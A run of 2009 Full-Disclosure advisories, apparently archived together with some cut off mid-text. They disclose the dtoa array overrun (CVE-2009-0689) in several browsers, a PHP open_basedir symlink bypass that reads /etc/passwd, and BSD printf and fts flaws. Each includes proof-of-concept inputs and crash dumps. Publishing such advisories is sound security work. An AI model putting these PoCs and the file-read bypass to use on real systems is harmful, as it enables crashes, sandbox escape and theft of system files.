hi, in php 5.3.1 security changelog, we can read, that safe_mode bypass in tempnam() has been already fixed. But safe_mode in 5.3 line is deprecated. We can understand security fix for open_basedir bypass, but not for safe_mode in 5.3. Annoying is the fact, that exploit for bypass open_basedir or safe_mode in php 5.3.1 is avaliable in http://securityreason.com/achievement_exploitalert/14 we can use symlink trick like in http://securityreason.com/achievement_securityalert/70 The issue has been reported to PHP, but did not obtain a meaningful response. Very similar issue has been reproted in October 2006 by Stefan Esser (SREASON:1692) http://securityreason.com/securityalert/1692 This issue has been fixed. Small difference, with this is that we need create fake directories structure. -- Best Regards, pub 1024D/A6986BD6 2008-08-22 uid Maksymilian Arciemowicz (cxib) sub 4096g/0889FA9A 2008-08-22 http://securityreason.com http://securityreason.com/key/Arciemowicz.Maksymilian.gpg signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SecurityReason: KDE KDELibs 4.3.3 Remote Array Overrun (Arbitrary code execution)
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ KDE KDELibs 4.3.3 Remote Array Overrun (Arbitrary code execution) ]
Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- - Dis.: 07.05.2009
- - Pub.: 20.11.2009
CVE: CVE-2009-0689
Risk: High
Remote: Yes
Affected Software:
- - KDELibs 4.3.3
NOTE: Prior versions may also be affected.
Original URL:
http://securityreason.com/achievement_securityalert/74
- --- 0.Description ---
KDELibs is a collection of libraries built on top of Qt that provides
frameworks and functionality for developers of KDE-compatible software.
The KDELibs libraries are licensed under LGPL.
- --- 1. KDE KDELibs 4.3.2 Remote Array Overrun (Arbitrary code
execution) ---
The main problem exist in dtoa implementation. KDE has a very similar
dtoa algorithm to the BSD, Chrome and Mozilla products. Problem exist
in dtoa.cpp file
http://websvn.kde.org/tags/KDE/4.3.3/kdelibs/kjs/dtoa.cpp?revision=1042584&view=markup
and it is the same like SREASONRES:20090625.
http://securityreason.com/achievement_securityalert/63
but fix for SREASONRES:20090625, used by openbsd was not good.
More information about fix for openbsd and similars SREASONRES:20091030,
http://securityreason.com/achievement_securityalert/69
We can create any number of float, which will overwrite the memory. In
Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and
it is possible to call 16<= elements of freelist array.
- --- 2. Proof of Concept (PoC) ---
- ---
var a=0.<?php echo str_repeat("9",29); ?>;
- ---
If we use konqueror to see this PoC, konqueror will crash. For example
- ---
var a=0.<?php echo str_repeat("1",296450); ?>;
- ---
Program received signal SIGSEGV, Segmentation fault.
[Switching to process 24845, thread 0x7e6e6800]
0x090985c3 in diff () from /usr/local/lib/libkjs.so.5.0
0x06db85c3 : mov%esi,(%ecx)
#0 0x090985c3 in diff () from /usr/local/lib/libkjs.so.5.0
#1 0x0909901b in kjs_strtod () from /usr/local/lib/libkjs.so.5.0
#2 0x090738e5 in KJS::Lexer::lex () from /usr/local/lib/libkjs.so.5.0
#3 0x0907300c in kjsyylex () from /usr/local/lib/libkjs.so.5.0
#4 0x09072f86 in kjsyyparse () from /usr/local/lib/libkjs.so.5.0
#5 0x090805cf in KJS::Parser::parse () from /usr/local/lib/libkjs.so.5.0
#6 0x0908337f in KJS::InterpreterImp::evaluate ()
(gdb) i r
eax0x0 0
ecx0x220ff000 571469824
edx0x0 0
ebx0x220fbb00 571456256
esp0xcfbc04e0 0xcfbc04e0
ebp0xcfbc0518 0xcfbc0518
esi0xc71c71c7 -954437177
edi0x0 0
eip0x21415c30x21415c3
esi=0x71c71c7
- --- 3. SecurityReason Note ---
Officialy SREASONRES:20090625 has been detected in:
- - OpenBSD
- - NetBSD
- - FreeBSD
- - MacOSX
- - Google Chrome
- - Mozilla Firefox
- - Mozilla Seamonkey
- - KDE (example: konqueror)
- - Opera
- - K-Meleon
This list is not yet closed. US-CERT declared that will inform all
vendors about this issue, however, they did not do it. Even greater
confusion caused new CVE number "CVE-2009-1563". Secunia has informed
that this vulnerability was only detected in Mozilla Firefox, but nobody
was aware that the problem affects other products like ( KDE, Chrome )
and it is based on "CVE-2009-0689". After some time Mozilla Foundation
Security Advisory
("http://www.mozilla.org/security/announce/2009/mfsa2009-59.html";)
was updated with note :
"The underlying flaw in the dtoa routines used by Mozilla appears to be
essentially the same as that reported against the libc gdtoa routine by
Maksymilian Arciemowicz ( CVE-2009-0689)".
This fact ( new CVE number for Firefox Vulnerability )and PoC in
javascript (from Secunia), forced us to official notification all other
vendors. We publish all the individual advisories, to formally show all
vulnerable software and to avoid wrong CVE number. We do not see any
other way to fix this issue in all products.
- --- 4. Fix ---
NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h
OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
htt
[Full-disclosure] SecurityReason: Opera 10.01 Remote Array Overrun (Arbitrary code execution)
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ Opera 10.01 Remote Array Overrun (Arbitrary code execution) ]
Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- - Dis.: 07.05.2009
- - Pub.: 20.11.2009
CVE: CVE-2009-0689
Risk: High
Remote: Yes
Affected Software:
- - Opera 10.01
- - Opera 10.10 Beta
NOTE: Prior versions may also be affected.
Original URL:
http://securityreason.com/achievement_securityalert/73
- --- 0.Description ---
Opera is a Web browser and Internet suite developed by the Opera
Software company. The browser handles common Internet-related tasks such
as displaying Web sites, sending and receiving e-mail messages, managing
contacts, IRC online chatting, downloading files via BitTorrent, and
reading Web feeds. Opera is offered free of charge for personal
computers and mobile phones.
- --- 1. Opera 10.01 Remote Array Overrun (Arbitrary code execution) ---
The main problem exist in dtoa implementation. Opera has a very similar
dtoa algorithm to the BSD, Chrome and Mozilla products. It is the same
issue like SREASONRES:20090625.
http://securityreason.com/achievement_securityalert/63
but fix for SREASONRES:20090625, used by openbsd was not good.
More information about fix for openbsd and similars SREASONRES:20091030,
http://securityreason.com/achievement_securityalert/69
We can create any number of float, which will overwrite the memory. In
Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it
is possible to call 16<= elements of freelist array.
- --- 2. Proof of Concept (PoC) ---
- ---
var a=0.<?php echo str_repeat("9",29); ?>;
- ---
If we use Opera to see this PoC, Opera will crash. For example
- ---
var a=0.<?php echo str_repeat("1",296450); ?>;
- ---
OPERA-CRASHLOG V1 desktop 10.01 1844 windows
Opera.exe 1844 caused exception C005 at address 67956906 (Base: 40)
Registers:
EAX=01165C40 EBX=0592064C ECX=A0D589D4 EDX=4200 ESI=C20471EC
EDI= EBP=0012E384 ESP=0012E2FC EIP=67956906 FLAGS=00010202
CS=001B DS=0023 SS=0023 ES=0023 FS=003B GS=
FPU stack:
C020A38F66534266F000 C020A38F66534266F000 3FFBE38E38E38E38D800
3FC78000 1001 0BBE0004
2EBA804E2FDE SW=0122 CW=027F
127# gdb -q opera opera.core
...
Program terminated with signal 11, Segmentation fault.
#0 0x2960307b in ?? ()
...
(gdb) i r
eax0x71c71c71 1908874353
ecx0x2aa03be4 715144164
edx0x0 0
ebx0x296177f8 694253560
esp0xbfbfb650 0xbfbfb650
ebp0xbfbfb698 0xbfbfb698
esi0x2962d000 694341632
edi0x0 0
eip0x2960307b 0x2960307b
...
(gdb) x/100x ($esi)-90
0x2962cfa6: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71
0x2962cfb6: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c
0x2962cfc6: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7
0x2962cfd6: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71
0x2962cfe6: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c
0x2962cff6: 0xc71c71c7 0x71c71c71 Cannot access memory at
address 0x2962cffe
...
- --- 3. SecurityReason Note ---
Officialy SREASONRES:20090625 has been detected in:
- - OpenBSD
- - NetBSD
- - FreeBSD
- - MacOSX
- - Google Chrome
- - Mozilla Firefox
- - Mozilla Seamonkey
- - KDE (example: konqueror)
- - Opera
- - K-Meleon
This list is not yet closed. US-CERT declared that will inform all
vendors about this issue, however, they did not do it. Even greater
confusion caused new CVE number "CVE-2009-1563". Secunia has informed
that this vulnerability was only detected in Mozilla Firefox, but nobody
was aware that the problem affects other products like ( KDE, Chrome )
and it is based on "CVE-2009-0689". After some time Mozilla Foundation
Security Advisory
("http://www.mozilla.org/security/announce/2009/mfsa2009-59.html";)
was updated with note :
"The underlying flaw in the dtoa routines used by Mozilla appears to be
essentially the same as that reported against the libc gdtoa routine by
Maksymilian Arciemowicz ( CVE-2009-0689)".
This fact ( new CVE number for Firefox Vulnerability )and PoC in
javascript (from Secunia), forced us to official notification all other
vendors. We publish all the individual advisories, to formally show all
vulnerable software and to avoid wrong CVE number. We do not see any
other way to fix this issue in all products.
- --- 4. Fix ---
Opera fix:
The vulnerability was fixed in the latest release candidate Opera RC3 :
http://snapshot.opera.com/windows/Opera_1010_1890_in.exe
In shortly time we can expect the final verion of Opera with the fix.
NetBSD fix (optimal):
http://cvsweb.netbsd.org/b
[Full-disclosure] SecurityReason: K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution)
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ]
Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- - Dis.: 07.05.2009
- - Pub.: 20.11.2009
CVE: CVE-2009-0689
Risk: High
Remote: Yes
Affected Software:
- - K-Meleon 1.5.3
NOTE: Prior versions may also be affected.
Original URL:
http://securityreason.com/achievement_securityalert/72
- --- 0.Description ---
K-Meleon is an extremely fast, customizable, lightweight web browser
based on the Gecko layout engine developed by Mozilla which is also used
by Firefox. K-Meleon is free, open source software released under the
GNU General Public License and is designed specifically for Microsoft
Windows (Win32) operating systems.
- --- 1. K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ---
The main problem exist in dtoa implementation. K-Meleon has the same
dtoa as a KDE, Opera and all BSD systems. This issue has been fixed in
Firefox 3.5.4 and fix
http://securityreason.com/achievement_securityalert/63
but fix for SREASONRES:20090625, used by openbsd was not good.
More information about fix for openbsd and similars SREASONRES:20091030,
http://securityreason.com/achievement_securityalert/69
We can create any number of float, which will overwrite the memory. In
Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it
is possible to call 16<= elements of freelist array.
- --- 2. Proof of Concept (PoC) ---
- ---
var a=0.<?php echo str_repeat("1",296450); ?>;
- ---
K-Meleon will crash with
Unhandled exception at 0x01800754 in k-meleon.exe: 0xC005: Access
violation reading location 0x0bc576ec.
01800754 mov eax,dword ptr [ecx]
EAX 0002
ECX 0BC576EC
EDI 028FEB51
- --- 3. SecurityReason Note ---
Officialy SREASONRES:20090625 has been detected in:
- - OpenBSD
- - NetBSD
- - FreeBSD
- - MacOSX
- - Google Chrome
- - Mozilla Firefox
- - Mozilla Seamonkey
- - KDE (example: konqueror)
- - Opera
- - K-Meleon
This list is not yet closed. US-CERT declared that will inform all
vendors about this issue, however, they did not do it. Even greater
confusion caused new CVE number "CVE-2009-1563". Secunia has informed
that this vulnerability was only detected in Mozilla Firefox, but nobody
was aware that the problem affects other products like ( KDE, Chrome )
and it is based on "CVE-2009-0689". After some time Mozilla Foundation
Security Advisory
("http://www.mozilla.org/security/announce/2009/mfsa2009-59.html";)
was updated with note :
"The underlying flaw in the dtoa routines used by Mozilla appears to be
essentially the same as that reported against the libc gdtoa routine by
Maksymilian Arciemowicz ( CVE-2009-0689)".
This fact ( new CVE number for Firefox Vulnerability )and PoC in
javascript (from Secunia), forced us to official notification all other
vendors. We publish all the individual advisories, to formally show all
vulnerable software and to avoid wrong CVE number. We do not see any
other way to fix this issue in all products.
Please note:
Patch used in Firefox 3.5.4 does not fully solve the problem. Dtoa
algorithm is not optimal and allows remote Denial of Service in Firefox
3.5.5 giving long float number.
- --- 4. Fix ---
NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h
OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c
http://w
[Full-disclosure] SecurityReason: SeaMonkey 1.1.8 Remote Array Overrun (Arbitrary code execution)
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ SeaMonkey 1.1.8 Remote Array Overrun (Arbitrary code execution) ]
Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- - Dis.: 07.05.2009
- - Pub.: 20.11.2009
CVE: CVE-2009-0689
Risk: High
Remote: Yes
Affected Software:
- - SeaMonkey 1.1.18
Fixed in:
- - SeaMonkey 2.0
NOTE: Prior versions may also be affected.
Original URL:
http://securityreason.com/achievement_securityalert/71
- --- 0.Description ---
The SeaMonkey project is a community effort to develop the SeaMonkey
all-in-one internet application suite (see below). Such a software suite
was previously made popular by Netscape and Mozilla, and the SeaMonkey
project continues to develop and deliver high-quality updates to this
concept. Containing an Internet browser, email & newsgroup client with
an included web feed reader, HTML editor, IRC chat and web development
tools, SeaMonkey is sure to appeal to advanced users, web developers and
corporate users.
- --- 1. SeaMonkey 1.1.18 Remote Array Overrun (Arbitrary code
execution) ---
The main problem exist in dtoa implementation. SeaMonkey has the same
dtoa as a KDE, Opera and all BSD systems. This issue has been fixed in
Firefox 3.5.4 and fix
http://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&whitespace_mode=show&file=jsdtoa.c&branch=&root=/cvsroot&subdir=mozilla/js/src&command=DIFF_FRAMESET&rev1=3.41&rev2=3.42
has been used to patch SeaMonkey 2.0.
This flaw has been detected in may 2009 and signed SREASONRES:20090625.
http://securityreason.com/achievement_securityalert/63
but fix for SREASONRES:20090625, used by openbsd was not good.
More information about fix for openbsd and similars SREASONRES:20091030,
http://securityreason.com/achievement_securityalert/69
We can create any number of float, which will overwrite the memory. In
Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it
is possible to call 16<= elements of freelist array.
- --- 2. Proof of Concept (PoC) ---
- ---
var a=0.<?php echo str_repeat("9",29); ?>;
- ---
If we use SeaMonkey to see this PoC, SeaMonkey will crash. For example
- ---
var a=0.<?php echo str_repeat("1",296450); ?>;
- ---
127# gdb seamonkey-bin seamonkey-bin.core
...
#0 0x28df0ecb in ?? ()
...
(gdb) i r
eax0x0 0
ecx0x2 2
edx0xbfbfd2fc -1077947652
ebx0x28da9b6c 685415276
esp0xbfbfd2ac 0xbfbfd2ac
ebp0xbfbfd2c8 0xbfbfd2c8
esi0xb 11
edi0xb 11
eip0x28df0ecb 0x28df0ecb
...
esi = esi = 11
- --- 3. SecurityReason Note ---
Officialy SREASONRES:20090625 has been detected in:
- - OpenBSD
- - NetBSD
- - FreeBSD
- - MacOSX
- - Google Chrome
- - Mozilla Firefox
- - Mozilla Seamonkey
- - KDE (example: konqueror)
- - Opera
- - K-Meleon
This list is not yet closed. US-CERT declared that will inform all
vendors about this issue, however, they did not do it. Even greater
confusion caused new CVE number "CVE-2009-1563". Secunia has informed
that this vulnerability was only detected in Mozilla Firefox, but nobody
was aware that the problem affects other products like ( KDE, Chrome )
and it is based on "CVE-2009-0689". After some time Mozilla Foundation
Security Advisory
("http://www.mozilla.org/security/announce/2009/mfsa2009-59.html";)
was updated with note :
"The underlying flaw in the dtoa routines used by Mozilla appears to be
essentially the same as that reported against the libc gdtoa routine by
Maksymilian Arciemowicz ( CVE-2009-0689)".
This fact ( new CVE number for Firefox Vulnerability )and PoC in
javascript (from Secunia), forced us to official notification all other
vendors. We publish all the individual advisories, to formally show all
vulnerable software and to avoid wrong CVE number. We do not see any
other way to fix this issue in all products.
Please note:
Patch used in Firefox 3.5.4 does not fully solve the problem. Dtoa
algorithm is not optimal and allows remote Denial of Service in Firefox
3.5.5 giving long float number.
- --- 4. Fix ---
NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h
OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/s
[Full-disclosure] PHP 5.2.11/5.3.0 Multiple Vulnerabilities
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ PHP 5.2.11/5.3.0 Multiple Vulnerabilities ]
Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - Dis.: 01.10.2009
- - Pub.: 13.11.2009
Risk: Medium
Affected Software:
- - PHP 5.3.0
- - PHP 5.2.11
Original URL:
http://securityreason.com/achievement_securityalert/70
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is
borrowed from C, Java and Perl with a couple of unique PHP-specific
features thrown in. The goal of the language is to allow web developers
to write dynamically generated pages quickly.
http://lu2.php.net/manual/en/function.symlink.php
ksymlink ? Creates a symbolic link
bool symlink ( string $target , string $link )
- --- 1. PHP 5.2.11/5.3.0 Multiple Vulnerabilities ---
The first main problem exist in security model based on symlinks
open_basedir. Paths like $target and $link are checked by open_basedir.
We can bypass open_basedir, but function symlink() is not affected.
Issue has been generated by false security model designed by PHP.
example:
127# cat sym.php
127# php sym.php
PHP Warning: symlink(): open_basedir restriction in effect.
File(/etc/passwd) is not within the allowed path(s): (/www) in
/www/test/sym.php on line 2
Warning: symlink(): open_basedir restriction in effect.
File(/etc/passwd) is not within the allowed path(s): (/www) in
/www/test/sym.php on line 2
127#
open_basedir will disallow /etc/passwd.
Let`s see:
127# ls -la
total 8
drwxr-xr-x 2 www www 512 Oct 20 00:33 .
drwxr-xr-x 13 www www 1536 Oct 20 00:26 ..
- -rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php
- -rw-r--r-- 1 www www45 Oct 20 00:26 sym.php
127# pwd
/www/test
127# cat kakao.php
127# php kakao.php
127# ls -la
total 12
drwxr-xr-x 4 www www 512 Oct 20 00:37 .
drwxr-xr-x 13 www www 1536 Oct 20 00:26 ..
drwxr-xr-x 4 www www 512 Oct 20 00:37 abc
lrwxr-xr-x 1 www www27 Oct 20 00:37 exploit ->
tmplink/../../../etc/passwd
- -rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php
- -rw-r--r-- 1 www www45 Oct 20 00:26 sym.php
drwxr-xr-x 2 www www 512 Oct 20 00:37 tmplink
127# cat exploit
# passwd
#
root:*:0:0:god:/root:/bin/csh
...
now "tmplink" is a directory. so link "exploit" will be
"../../etc/passwd". We don't need bypass open_basedir, it is a design
mistake. PHP will allow "tmplink/../../../etc/passwd" because
./tmplink/../../../etc/passwd realy exists.
So if we want read other file, we need create other structure.
example "/usr/pkg/etc/php.ini":
mkdir("usr");
chdir("usr");
mkdir("pkg");
chdir("pkg");
mkdir("etc");
chdir("etc");
mkdir("php.ini");
chdir("..");
chdir("..");
chdir("..");
PHP will confirm, that tmplink/../../../usr/pkg/etc/php.ini realy exist.
Very important is removing fake link "tmplink" and we need to create in
this same place dir with this same name.
unlink("tmplink");
mkdir("tmplink");
This is the main trick here. Because, "tmplink" (dir) are only -1 deep,
not -4.
Under PHP 5.2.11 we can also bypass safe_mode. However, the security,
such as whether to run suphp php with the privileges of users also have
their drawbacks.
We can use our exploit to show this vulnerability. If httpd allow read
link (default), we can create symlink to / (ofcourse if we have access).
If we can not read symlink, we can use next PHP flaw "hazard syphon" to
read other files.
example of php hazard (session) (open_basedir=/www):
script0 "/www/test/.htaccess":
php_value session.save_path "/www/test/notyetexists"
file /www/test/notyetexists doesn`t exist (current)
script1 "/www/test/sessrun.php"
now we have 60 sec to run script2
script2 "/www/test/runin60.php":
Hazard exist in PHP!
Plan of action:
0. Create .htaccess with 'session.save_path "/www/test/notyetexists"'.
1. Run script1, where first phase (SAPI) will check privileges to
/www/test/notyetexists. But this file or dir, doesn't exists, so
open_basedir will return false.
2. Script1 will generate sleep signal with 60sec delay. In this momemnt,
we need run Scritp2. This script, will create link
/www/test/notyetexists to /tmp or other directories.
3. Script1 after 60sec will run session_start() function, where
privileges to /www/test/notyetexists aren't checked in this moment.
In result, we can use function sleep() to create fake delay and first
issue can help create symlinks.
- --- 2. Exploit ---
open_basedir bypass:
http://securityreason.com/achievement_exploitalert/14
hazard analogy, as in this note
- --- 3. Fix ---
Fix not avaliable
- --- 4. Greets ---
sp3x Infospec Chujwamwdupe p_e_a pi3
- --- 4. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email: cxib {a.t] securi
[Full-disclosure] SecurityReason: Multiple BSD printf(1) and multiple dtoa/*printf(3) vulnerabilities
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ Multiple BSD printf(1) and multiple dtoa/*printf(3) vulnerabilities ]
Author: Maksymilian Arciemowicz
SecurityReason.com
Date:
- - Dis.: 29.06.2009
- - Pub.: 30.10.2009
We are going inform all vendors, about this problem
Affected Software (official):
- - OpenBSD 4.6
- - NetBSD 5.0.1
probably more (macosx, chrome, firefox,..)...
Original URL:
http://securityreason.com/achievement_securityalert/69
- --- 0.Description ---
printf(1) formats and prints its arguments, after the first, under control of
the format. The format is a character string
which contains three types of objects: plain characters, which are simply
copied to standard output, character escape sequences
which are converted and copied to the standard output, and format
specifications, each of which causes printing of the next
successive argument.
SYNOPSIS
printf format [arguments ...]
The printf(3) family of functions produces output according to a format as
described below. The printf(3) and vprintf(3)
functions write output to stdout, the standard output stream; fprintf(3) and
vfprintf(3) write output to the given output
stream; sprintf(3), snprintf(3), vsprintf(3), and vsnprintf(3) write to the
character string str; and asprintf(3) and
vasprintf(3) write to a dynamically allocated string that is stored in ret.
SYNOPSIS
int
printf(const char * restrict format, ...);
- --- 1. Multiple BSD printf(1) and multiple dtoa/*printf(3) vulnerabilities ---
The first problem exists in usr.bin/printf/printf.c. printf(1) in NetBSD and
OpenBSD, have problem with a field width and
precision. Difference between printf(1) and printf(3) is that the printf(1) has
its own filter for formating fmt. To see
acceptable tags, use manual "man 1 printf".
We can use char '*' in fmt, to declaring size in next arg.
example:
# printf %1.*f 1 1.2345
1.2
So, printf allow to use "*" in fmt.
- ---
...
fieldwidth = *fmt == '*' ? getint() : 0;
...
- ---
The problem is that the program does not verify the accuracy of fmt.
It is possible to use '*' a few times
=>
function getint() will be started a few times.
getint() returns the value allocated in memory ( function printf(3) ).
example:
# printf %1.**f 1 1.2345
/* long exec. */
precision here, will be taken from stack. This means that the precision is the
number retrieved from the stack. Further addition
of the '*' char, will moving the pointer of precision.
As a result, we try to appoint offset to control register esi and edi. But to
do this, we need to change the fmt type of float
to string .
example (string):
# printf %*s 666
Memory fault (core dumped)
and we are in home. We need add "*" to try control esi and edi reg.
# gdb -q printf
(no debugging symbols found)
(gdb) r "%*s" 666
Starting program: /usr/bin/printf "%*s" 666
(no debugging symbols found)
(no debugging symbols found)
Program received signal SIGSEGV, Segmentation fault.
0xbbba6a2a in __vfprintf_unlocked () from /usr/lib/libc.so.12
(gdb) i r
eax0x0 0
ecx0x -1
edx0x0 0
ebx0xbbbd5b38 -1145218248
esp0xbfbfe320 0xbfbfe320
ebp0xbfbfec08 0xbfbfec08
esi0x29a666
edi0x29a666
esi and edi are 666 (netbsd)
under openbsd, we have randomization, so it will be not so easy.
- ---
727 size = p ? (p - cp) : prec;
728 } else {
729 size_t len;
730
731 if ((len = strlen(cp)) > INT_MAX)
732 goto overflow;
733 size = (int)len;
734 }
735 sign = '\0';
- ---
program will crash in 731 line (strlen(cp)).
Variable "cp" will be allocated in 666 addr in memory. So we can try manipulate
of addr "cp" variable. That means that the
shells are also affected (like /bin/sh /bin/csh) because printf is also used as
a shell buit-in. We do not have accurate
information, who uses a flawed implementation.
printf(1) should use "IEEE 1003.1-2001" standard.
Next problem with the printf(3) is very similar to "Multiple Vendors libc/gdtoa
printf(3) Array Overrun" (SREASONRES:20090625)
and concerns the implementation of gdtoa. We can try allocate a lot of memory,
that malloc will generate crash. Issue has been
detected in gdtoa from openbsd. NetBSD fix for (SREASONRES:20090625) is not
affected and we thing that is better. Discrepancy
theory, divided netbsd and openbsd.
example:
# printf %.11f 1.1
Segmentation fault (core dumped)
...
(gdb) bt
#0 __Balloc_D2A (k=29) at /usr/src/lib/libc/gdtoa/misc.c:75
#1 0x
[Full-disclosure] libc:fts_*() Multiple Denial of Service
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[libc:fts_*() Multiple Denial of Service ]
Author: Maksymilian Arciemowicz
SecurityReason.com
Date:
- - Dis.: 03.08.2009
- - Pub.: 02.10.2009
We are going inform all vendors, about this problem.
Affected Software (official):
- - OpenBSD 4.5 (fix available)
- - NetBSD 5.0.1 (fix available)
probably more...
Original URL:
http://securityreason.com/achievement_securityalert/68
- --- 0.Description ---
The fts functions are provided for traversing UNIX file hierarchies. The
fts_open() function returns a "handle" on a file
hierarchy, which is then supplied to the other fts functions. The function
fts_read() returns a pointer to a structure
describing one of the files in the file hierarchy. The function fts_children()
returns a pointer to a linked list of structures,
each of which describes one of the files contained in a directory within the
hierarchy.
typedef struct _ftsent {
unsigned short fts_info; /* flags for FTSENT structure
*/
char *fts_accpath; /* access path */
char *fts_path; /* root path */
size_t fts_pathlen; /* strlen(fts_path) */
char *fts_name; /* file name */
size_t fts_namelen; /* strlen(fts_name) */
short fts_level; /* depth (-1 to N) */
int fts_errno; /* file errno */
long fts_number; /* local numeric value */
void *fts_pointer; /* local address value */
struct _ftsent *fts_parent; /* parent directory */
struct _ftsent *fts_link; /* next file structure */
struct _ftsent *fts_cycle; /* cycle structure */
struct stat *fts_statp; /* stat(2) information */
} FTSENT;
- --- 1. libc:fts_*() Multiple Denial of Service ---
In March 2009, we have reported an issue (SREASONRES:20090304) in libc (fts.c).
Now we want to present the conclusions and show
the usefulness of this vulnerabality. Fix provided by OpenBSD Team will protect
us by crash but we think, not for all cases,
that are showed in this advisory.
Index: fts.c
===
RCS file: /cvs/src/lib/libc/gen/fts.c,v
retrieving revision 1.41
diff -u -p -r1.41 fts.c
- - --- fts.c 27 Dec 2008 12:30:13 - 1.41
+++ fts.c 10 Feb 2009 09:00:24 -
@@ -633,6 +633,14 @@ fts_build(FTS *sp, int type)
len++;
maxlen = sp->fts_pathlen - len;
+ if (cur->fts_level == SHRT_MAX) {
